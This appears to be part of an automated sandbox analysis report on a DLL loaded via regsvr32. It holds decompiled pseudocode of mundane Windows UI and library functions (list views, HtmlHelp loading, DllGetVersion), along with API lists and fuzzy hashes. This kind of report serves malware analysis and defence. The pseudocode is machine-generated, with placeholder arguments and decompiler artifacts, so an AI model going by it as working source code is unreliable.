						r9d =  *((intOrPtr*)(_t110 + 0xac));
						if(r9d > 0) {
							_t114 = 0x10059e60;
							r8d = E10039820(E1003AE90(0x10059e60, _t115),  &_v104);
							E1000B5C0( &_v184,  &_v104, _t110, _t111, 0x10059e60, _t116, _t117, _t118);
						}
					}
				} else {
					if(_t74 != 0) {
						r8d = E10039820(_t35, _t74);
						_t51 = E1000B5C0( &_v184, _t74, _t110, _t111, _t114, _t116, _t117, _t118);
						r9d =  *((intOrPtr*)(_t110 + 0xac));
						if(r9d > 0) {
							_t114 = 0x10059e60;
							r8d = E10039820(E1003AE90(0x10059e60, _t115),  &_v168);
							_t51 = E1000B5C0( &_v184,  &_v168, _t110, _t111, 0x10059e60, _t116, _t117, _t118);
						}
						r8d = E10039820(_t51, 0x10059e58);
						E1000B5C0( &_v184, 0x10059e58, _t110, _t111, _t114, _t116, _t117, _t118);
					}
					r8d =  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0x158)) - 0x10));
					E1000B5C0( &_v184,  *((intOrPtr*)(_t110 + 0x158)), _t110, _t111, _t114, _t116, _t117, _t118);
				}
				_t75 = _v184;
				E10029A2C(_t58,  *((intOrPtr*)(_t110 + 0x40)), _t75, _t114, _t115);
				_t102 = _t75 - 0x18;
				asm("lock xadd [edx+0x10], eax");
				if(0x1fffffffe <= 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t102)) + 8))();
				}
				return E10038D20(_t58, _v40 ^ _t113);
			}




























                                                                              0x10021630
                                                                              0x10021630
                                                                              0x10021630
                                                                              0x10021630
                                                                              0x10021630
                                                                              0x1002163a
                                                                              0x10021643
                                                                              0x1002164a
                                                                              0x1002164d
                                                                              0x10021655
                                                                              0x10021658
                                                                              0x1002165b
                                                                              0x10021660
                                                                              0x10021665
                                                                              0x10021668
                                                                              0x1002166d
                                                                              0x1002166f
                                                                              0x10021674
                                                                              0x10021679
                                                                              0x10021679
                                                                              0x1002167a
                                                                              0x10021680
                                                                              0x10021683
                                                                              0x10021687
                                                                              0x1002168f
                                                                              0x10021694
                                                                              0x10021698
                                                                              0x1002173a
                                                                              0x10021743
                                                                              0x1002174b
                                                                              0x10021759
                                                                              0x10021775
                                                                              0x10021780
                                                                              0x10021785
                                                                              0x1002178f
                                                                              0x10021791
                                                                              0x100217b1
                                                                              0x100217be
                                                                              0x100217be
                                                                              0x1002178f
                                                                              0x1002169e
                                                                              0x100216a1
                                                                              0x100216ab
                                                                              0x100216b6
                                                                              0x100216bb
                                                                              0x100216c5
                                                                              0x100216c7
                                                                              0x100216e7
                                                                              0x100216f4
                                                                              0x100216f4
                                                                              0x10021705
                                                                              0x10021714
                                                                              0x10021714
                                                                              0x10021720
                                                                              0x10021729
                                                                              0x10021729
                                                                              0x100217c3
                                                                              0x100217cf
                                                                              0x100217d5
                                                                              0x100217de
                                                                              0x100217e8
                                                                              0x100217f0
                                                                              0x100217f0
                                                                              0x1002180c

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: sprintf_s
                                                                              • String ID: - $:%d
                                                                              • API String ID: 2907819478-2359489159
                                                                              • Opcode ID: 954e0d4a014b9122870b610338be72d12af1da13647c20ce82e94437da63adeb
                                                                              • Instruction ID: 28b38e1510274cfd0e16a5a83c551c658babd376fc486fb4b11985eb34bf0871
                                                                              • Opcode Fuzzy Hash: 954e0d4a014b9122870b610338be72d12af1da13647c20ce82e94437da63adeb
                                                                              • Instruction Fuzzy Hash: 1141263A314E8092DB21CF21F8017DE6361FBD5BD5F841122AA9D4BBA5EF2CD544CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10019890 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 49%
                                                                              			E10019890(void* __edx, void* __ebp, intOrPtr* __rcx, void* __rdx, void* __r8, void* __r9) {
				long long _v56;
				long long _v72;
				void* _t17;
				long _t19;
				void* _t21;
				short* _t35;
				intOrPtr* _t38;
				short _t41;
				void* _t47;
				void* _t48;
				intOrPtr* _t49;
				void* _t50;
				void* _t60;

				_t56 = __r9;
				_t52 = __r8;
				_t47 = __rdx;
				_t38 = __rcx;
				_t23 = __edx;
				_t48 = __r9;
				_t50 = __r8;
				_t21 = __edx;
				_t49 = __rcx;
				if(__edx < 0x2b || __edx > 0x2f && __edx != 0x39 && __edx != 0x4e && __edx != 0x111) {
					return E1000ECC4(_t23, _t38, _t52, _t56);
				} else {
					_t35 =  *_t38;
					_v72 =  &_v56;
					_t17 =  *((intOrPtr*)(_t35 + 0x218))();
					if(_t17 == 0) {
						_t41 =  *((intOrPtr*)(_t49 + 0xa8));
						__eflags = _t41;
						if(_t41 == 0) {
							L10:
							_t42 =  *((intOrPtr*)(_t49 + 0x70));
							__eflags =  *((intOrPtr*)(_t49 + 0x70));
							if( *((intOrPtr*)(_t49 + 0x70)) == 0) {
								GetParent();
								_t42 = _t35;
							}
							E10011808(_t21, _t23, _t35, _t42, _t47, _t52, _t56, _t60);
							_t19 = SendMessageW(??, ??, ??, ??);
							__eflags = _t21 - 0x4e;
							_v56 = _t35;
							if(_t21 != 0x4e) {
								L26:
								return _t19;
							} else {
								_t19 =  *(_t48 + 0x10);
								__eflags = _t19 - 0xfffffdf8;
								if(_t19 == 0xfffffdf8) {
									L16:
									__eflags =  *((long long*)(_t48 + 0x70));
									if( *((long long*)(_t48 + 0x70)) != 0) {
										goto L26;
									}
									_t35 =  *((intOrPtr*)(_t48 + 0x18));
									__eflags = _t35;
									if(_t35 == 0) {
										L24:
										_t19 = E1000ECC4(0x4e, _t49, _t50, _t48);
										L25:
										goto L26;
									}
									__eflags =  *_t35;
									L23:
									if(__eflags != 0) {
										goto L26;
									}
									goto L24;
								}
								__eflags = _t19 - 0xfffffdee;
								if(_t19 != 0xfffffdee) {
									goto L26;
								}
								__eflags = _t19 - 0xfffffdf8;
								if(_t19 != 0xfffffdf8) {
									__eflags = _t19 - 0xfffffdee;
									if(_t19 != 0xfffffdee) {
										goto L26;
									}
									__eflags =  *((long long*)(_t48 + 0xc0));
									if( *((long long*)(_t48 + 0xc0)) != 0) {
										goto L26;
									}
									_t35 =  *((intOrPtr*)(_t48 + 0x18));
									__eflags = _t35;
									if(_t35 == 0) {
										goto L24;
									}
									__eflags =  *_t35;
									goto L23;
								}
								goto L16;
							}
						}
						__eflags = _t21 - 0x111;
						if(_t21 != 0x111) {
							goto L10;
						}
						_t19 = SendMessageW();
						goto L25;
					}
					return _t17;
				}
			}
















                                                                              0x10019890
                                                                              0x10019890
                                                                              0x10019890
                                                                              0x10019890
                                                                              0x10019890
                                                                              0x1001989c
                                                                              0x1001989f
                                                                              0x100198a2
                                                                              0x100198a4
                                                                              0x100198a7
                                                                              0x00000000
                                                                              0x100198c8
                                                                              0x100198c8
                                                                              0x100198d0
                                                                              0x100198d8
                                                                              0x100198e0
                                                                              0x100198ec
                                                                              0x100198f3
                                                                              0x100198f6
                                                                              0x10019917
                                                                              0x10019917
                                                                              0x1001991b
                                                                              0x1001991e
                                                                              0x10019924
                                                                              0x1001992a
                                                                              0x1001992a
                                                                              0x1001992d
                                                                              0x1001993e
                                                                              0x10019944
                                                                              0x1001994a
                                                                              0x1001994f
                                                                              0x100199b2
                                                                              0x00000000
                                                                              0x10019951
                                                                              0x10019951
                                                                              0x1001995e
                                                                              0x10019960
                                                                              0x1001996a
                                                                              0x1001996a
                                                                              0x1001996f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10019971
                                                                              0x10019975
                                                                              0x10019978
                                                                              0x1001999c
                                                                              0x100199aa
                                                                              0x100199af
                                                                              0x00000000
                                                                              0x100199af
                                                                              0x1001997a
                                                                              0x1001999a
                                                                              0x1001999a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001999a
                                                                              0x10019962
                                                                              0x10019964
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10019966
                                                                              0x10019968
                                                                              0x1001997f
                                                                              0x10019981
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10019983
                                                                              0x1001998b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001998d
                                                                              0x10019991
                                                                              0x10019994
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10019996
                                                                              0x00000000
                                                                              0x10019996
                                                                              0x00000000
                                                                              0x10019968
                                                                              0x1001994f
                                                                              0x100198f8
                                                                              0x100198fe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001990c
                                                                              0x00000000
                                                                              0x1001990c
                                                                              0x00000000
                                                                              0x100198e2

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Parent
                                                                              • String ID: N
                                                                              • API String ID: 1020955656-1130791706
                                                                              • Opcode ID: d8e05fa47402cc35a87a030a5a64b5e92f03c27f5d6f71c9b06531383afd8420
                                                                              • Instruction ID: f2bae688f7232db413cbec0cd54f35bb5a54dcff960ce1c14d76d086b220f386
                                                                              • Opcode Fuzzy Hash: d8e05fa47402cc35a87a030a5a64b5e92f03c27f5d6f71c9b06531383afd8420
                                                                              • Instruction Fuzzy Hash: 80313021B0178686EE14CB6AA890B9C63A1F795FD4F15412ADF4A8B794EF3CD8C18301
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10013358 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E10013358(void* __ebx, void* __edx, long long __rax, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11) {
				void* _t15;
				void* _t18;
				void* _t19;
				long long _t23;
				long long _t24;
				void* _t37;
				void* _t40;

				_t40 = __r11;
				_t38 = __r9;
				_t37 = __r8;
				_t23 = __rax;
				_t18 = __edx;
				_t15 = __ebx;
				_t19 = r8d;
				E10029974();
				E10028704(0x100748a0, 0x100121d0);
				_t24 = _t23;
				if(_t23 == 0) {
					E10016544();
					asm("int3");
				}
				if( *((long long*)(_t23 + 0x10)) != 0) {
					L7:
					E10029A00();
					r8d = _t19;
					return  *((intOrPtr*)(_t24 + 0x10))();
				} else {
					E1000F8F4(_t15, 0xc, _t18, _t19, _t23, "hhctrl.ocx", 0x100121d0, _t37, _t38, _t40);
					 *((long long*)(_t24 + 8)) = _t23;
					if(_t23 != 0) {
						GetProcAddress();
						 *((long long*)(_t24 + 0x10)) = _t23;
						if(_t23 != 0) {
							goto L7;
						}
						FreeLibrary();
						 *((long long*)(_t24 + 8)) = 0;
					}
					return 0;
				}
			}










                                                                              0x10013358
                                                                              0x10013358
                                                                              0x10013358
                                                                              0x10013358
                                                                              0x10013358
                                                                              0x10013358
                                                                              0x1001336e
                                                                              0x10013374
                                                                              0x10013387
                                                                              0x1001338f
                                                                              0x10013392
                                                                              0x10013394
                                                                              0x10013399
                                                                              0x10013399
                                                                              0x1001339f
                                                                              0x100133e7
                                                                              0x100133ec
                                                                              0x100133f4
                                                                              0x00000000
                                                                              0x100133a1
                                                                              0x100133a8
                                                                              0x100133b0
                                                                              0x100133b4
                                                                              0x100133c4
                                                                              0x100133cd
                                                                              0x100133d1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100133d7
                                                                              0x100133dd
                                                                              0x100133dd
                                                                              0x00000000
                                                                              0x100133b6

                                                                              APIs
                                                                                • Part of subcall function 10029974: EnterCriticalSection.KERNEL32 ref: 100299AF
                                                                                • Part of subcall function 10029974: InitializeCriticalSection.KERNEL32 ref: 100299CB
                                                                                • Part of subcall function 10029974: LeaveCriticalSection.KERNEL32 ref: 100299E0
                                                                              • GetProcAddress.KERNEL32 ref: 100133C4
                                                                              • FreeLibrary.KERNEL32 ref: 100133D7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AddressEnterFreeInitializeLeaveLibraryProc
                                                                              • String ID: HtmlHelpW$hhctrl.ocx
                                                                              • API String ID: 3379933665-3773518134
                                                                              • Opcode ID: cb3e97aea07a4ac82fa3582dad11bd21e331dd95fd031ebd82691ff94325b289
                                                                              • Instruction ID: 8b37d9ebc5caa44c86d3683359edf0b5fa99c7a8e6536f9ea3601cb03cfbe87d
                                                                              • Opcode Fuzzy Hash: cb3e97aea07a4ac82fa3582dad11bd21e331dd95fd031ebd82691ff94325b289
                                                                              • Instruction Fuzzy Hash: EF11AD26302B4085EB06DB62FC447986390F748BC8F849438EE2D4B355EF78D9C4C380
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100224B4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1002FD48: CloseHandle.KERNEL32 ref: 1002FD5E
                                                                                • Part of subcall function 1002FD48: GetLastError.KERNEL32 ref: 1002FD8A
                                                                              • GetModuleHandleW.KERNEL32 ref: 100224F6
                                                                              • GetProcAddress.KERNEL32 ref: 10022506
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$AddressCloseErrorLastModuleProc
                                                                              • String ID: KERNEL32$ReplaceFileW
                                                                              • API String ID: 278208156-3323599776
                                                                              • Opcode ID: 46ee5039edb24d81e548164a3a24abf303b2e544551a07bdd94f39861d722aba
                                                                              • Instruction ID: 3ae1168fefa0e827edcf3adcd8427cb3fdac8d3239024b3067eaca83af3a15f5
                                                                              • Opcode Fuzzy Hash: 46ee5039edb24d81e548164a3a24abf303b2e544551a07bdd94f39861d722aba
                                                                              • Instruction Fuzzy Hash: 15115576700B4192DA15CF6AE85436C23A0FB89BE4F854225AA6E47BA0EF78C895C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001C34C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 51%
                                                                              			E1001C34C(long long __rax) {
				signed short _v48;
				signed short _v52;
				char _v56;
				signed int _t17;
				_Unknown_base(*)()* _t19;
				signed int _t24;
				void* _t26;
				signed int _t27;
				void* _t30;
				void* _t32;
				void* _t34;
				long long* _t43;
				intOrPtr _t44;
				long long* _t52;
				void* _t53;
				void* _t54;
				void* _t55;

				_t43 = __rax;
				_t17 =  *0x1006ed20; // 0xffffffff
				if(_t17 != 0xffffffff) {
					return _t17;
				}
				E1000A57C(_t26, _t30, _t32, _t34, __rax, _t53, _t54, _t55);
				_t44 =  *((intOrPtr*)( *((intOrPtr*)(__rax + 0xc8))));
				if( *((long long*)(_t44 + 8)) == 0) {
					GetModuleHandleW();
					 *((long long*)(_t44 + 8)) = __rax;
					if(__rax == 0) {
						_t24 = LoadLibraryW();
						 *((long long*)(_t44 + 8)) = __rax;
						 *((char*)(_t44 + 0x10)) = _t24 & 0xffffff00 | __rax != 0x00000000;
					}
				}
				_t51 = "DllGetVersion";
				_t19 = GetProcAddress(??, ??);
				_t27 = 0x40000;
				_t52 = _t43;
				if(_t43 != 0) {
					_t12 = _t51 + 0x14; // 0x14
					r8d = _t12;
					E1003A240(_t19, _t30, 0,  &_v56, "DllGetVersion", _t53);
					_v56 = 0x14;
					if( *_t52() >= 0) {
						_t27 = (_v52 & 0x0000ffff) << 0x00000010 | _v48 & 0x0000ffff;
					}
				}
				 *0x1006ed20 = _t27;
				return _t27;
			}




















                                                                              0x1001c34c
                                                                              0x1001c353
                                                                              0x1001c35c
                                                                              0x1001c400
                                                                              0x1001c400
                                                                              0x1001c362
                                                                              0x1001c36e
                                                                              0x1001c376
                                                                              0x1001c37c
                                                                              0x1001c385
                                                                              0x1001c389
                                                                              0x1001c38f
                                                                              0x1001c398
                                                                              0x1001c39f
                                                                              0x1001c39f
                                                                              0x1001c389
                                                                              0x1001c3a6
                                                                              0x1001c3ad
                                                                              0x1001c3b3
                                                                              0x1001c3bb
                                                                              0x1001c3be
                                                                              0x1001c3c7
                                                                              0x1001c3c7
                                                                              0x1001c3cb
                                                                              0x1001c3d5
                                                                              0x1001c3e1
                                                                              0x1001c3f0
                                                                              0x1001c3f0
                                                                              0x1001c3e1
                                                                              0x1001c3f2
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                              • String ID: DllGetVersion
                                                                              • API String ID: 310444273-2861820592
                                                                              • Opcode ID: ede2aff7d1ff8c8ac95f46d68507595c0b41dfc1cd5e75e58baac4b8740ef94b
                                                                              • Instruction ID: 2087697b1aabf3edfc1755d30e401b57f8e1de68586aff3ff430cf675a50c6c5
                                                                              • Opcode Fuzzy Hash: ede2aff7d1ff8c8ac95f46d68507595c0b41dfc1cd5e75e58baac4b8740ef94b
                                                                              • Instruction Fuzzy Hash: B81151327016848AEB11CF25EC8079C73A0F788B98F498129DB9D87354DF78DAD4CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10008560 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 72%
                                                                              			E10008560(void* __edx, void* __esi, void* __rax, long long __rbx, long long* __rcx, long long __rdi, void* __r8, void* __r9, void* __r11, long long _a8, long long _a24, long long _a32) {
				long long _v24;
				void* _t28;
				void* _t29;
				void* _t30;
				long long* _t42;

				_a8 = __rcx;
				_v24 = 0xfffffffe;
				_a24 = __rbx;
				_a32 = __rdi;
				_t42 = __rcx;
				r8d = 0x50800000;
				E1000BF10(__edx, __esi, __rax, __rcx, L"SysListView32", __r8, __r9, __r11);
				 *_t42 = 0x1005f648;
				 *((intOrPtr*)(_t42 + 0xc0)) = 0;
				 *((intOrPtr*)(_t42 + 0xc4)) = 1;
				 *((intOrPtr*)(_t42 + 0xc8)) = 0;
				 *((intOrPtr*)(_t42 + 0xcc)) = 0;
				 *((intOrPtr*)(_t42 + 0xd0)) = GetSysColor(??);
				 *((intOrPtr*)(_t42 + 0xd4)) = GetSysColor(??);
				 *((intOrPtr*)(_t42 + 0xd8)) = GetSysColor(??);
				 *_t42 = 0x100602d8;
				_t15 = _t42 + 0xe0; // 0xe0
				_t28 = E1000AFC8(_t27, _t15);
				_t16 = _t42 + 0xf0; // 0xf0
				_t29 = E1000AFC8(_t28, _t16);
				_t17 = _t42 + 0x100; // 0x100
				_t30 = E1000AFC8(_t29, _t17);
				 *((intOrPtr*)(_t42 + 0x110)) = 1;
				 *((intOrPtr*)(_t42 + 0x114)) = 0xffffffff;
				 *((long long*)(_t42 + 0x118)) = __rdi;
				 *((long long*)(_t42 + 0x120)) = __rdi;
				return _t30;
			}








                                                                              0x10008560
                                                                              0x10008569
                                                                              0x10008572
                                                                              0x10008577
                                                                              0x1000857c
                                                                              0x1000857f
                                                                              0x1000858c
                                                                              0x10008598
                                                                              0x1000859d
                                                                              0x100085a3
                                                                              0x100085ad
                                                                              0x100085b3
                                                                              0x100085c2
                                                                              0x100085d1
                                                                              0x100085e0
                                                                              0x100085ed
                                                                              0x100085f0
                                                                              0x100085f7
                                                                              0x100085fd
                                                                              0x10008604
                                                                              0x1000860a
                                                                              0x10008611
                                                                              0x10008616
                                                                              0x10008620
                                                                              0x1000862a
                                                                              0x10008631
                                                                              0x10008649

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Color
                                                                              • String ID: SysListView32
                                                                              • API String ID: 2811717613-78025650
                                                                              • Opcode ID: c6c958caf7ba9d9c7ab14c6c05002dad9d647224165e64971a79e94948d5f79c
                                                                              • Instruction ID: c015c91a5f6ebf258cc5c1d05f8409cdbd3bf8faf72e2f9ecfb12d470e7dc6a8
                                                                              • Opcode Fuzzy Hash: c6c958caf7ba9d9c7ab14c6c05002dad9d647224165e64971a79e94948d5f79c
                                                                              • Instruction Fuzzy Hash: D7214A76100B84C2D301CF71E8503DDB7A4F758B68F444336DB994B6A8DFB89194CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10029BAC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ClassCompareLongNameStringWindow
                                                                              • String ID: combobox
                                                                              • API String ID: 1414938635-2240613097
                                                                              • Opcode ID: 1f0bff40916be23f42563bd26a91499f5c48e53f84064149968b9e597561a448
                                                                              • Instruction ID: ac3ff59c6947d69b0e1a9b8f9597d508b5fc200ce855f50ac48218e954ec29d7
                                                                              • Opcode Fuzzy Hash: 1f0bff40916be23f42563bd26a91499f5c48e53f84064149968b9e597561a448
                                                                              • Instruction Fuzzy Hash: C301F233310B4087E722CB25F85139A73A1E7897E4F914221DA9A477A4EF7CC985CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100012C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 66%
                                                                              			E100012C0(void* __edx, void* __esi, void* __eflags, long long __rax, void* __rcx, void* __r8, void* __r9, void* __r11, long long _a8) {
				long long _v24;
				long _t17;
				long long _t26;
				long long* _t28;

				_t26 = __rax;
				_v24 = 0xfffffffe;
				E10009454(__eflags, __rax, __rcx);
				_t28 = _t26;
				_a8 = _t26;
				if(_t26 == 0) {
					__eflags = 0;
					return 0;
				}
				r8d = 0x50800000;
				E1000BF10(__edx, __esi, _t26, _t26, L"SysListView32", __r8, __r9, __r11);
				 *_t28 = 0x1005f648;
				 *((intOrPtr*)(_t28 + 0xc0)) = 0;
				 *((intOrPtr*)(_t28 + 0xc4)) = 1;
				 *((intOrPtr*)(_t28 + 0xc8)) = 0;
				 *((intOrPtr*)(_t28 + 0xcc)) = 0;
				 *((intOrPtr*)(_t28 + 0xd0)) = GetSysColor(??);
				 *((intOrPtr*)(_t28 + 0xd4)) = GetSysColor(??);
				_t17 = GetSysColor(??);
				 *(_t28 + 0xd8) = _t17;
				return _t17;
			}







                                                                              0x100012c0
                                                                              0x100012c6
                                                                              0x100012d4
                                                                              0x100012d9
                                                                              0x100012dc
                                                                              0x100012e4
                                                                              0x10001359
                                                                              0x00000000
                                                                              0x10001359
                                                                              0x100012e6
                                                                              0x100012f6
                                                                              0x10001302
                                                                              0x10001307
                                                                              0x1000130d
                                                                              0x10001317
                                                                              0x1000131d
                                                                              0x1000132c
                                                                              0x1000133d
                                                                              0x10001348
                                                                              0x1000134e
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
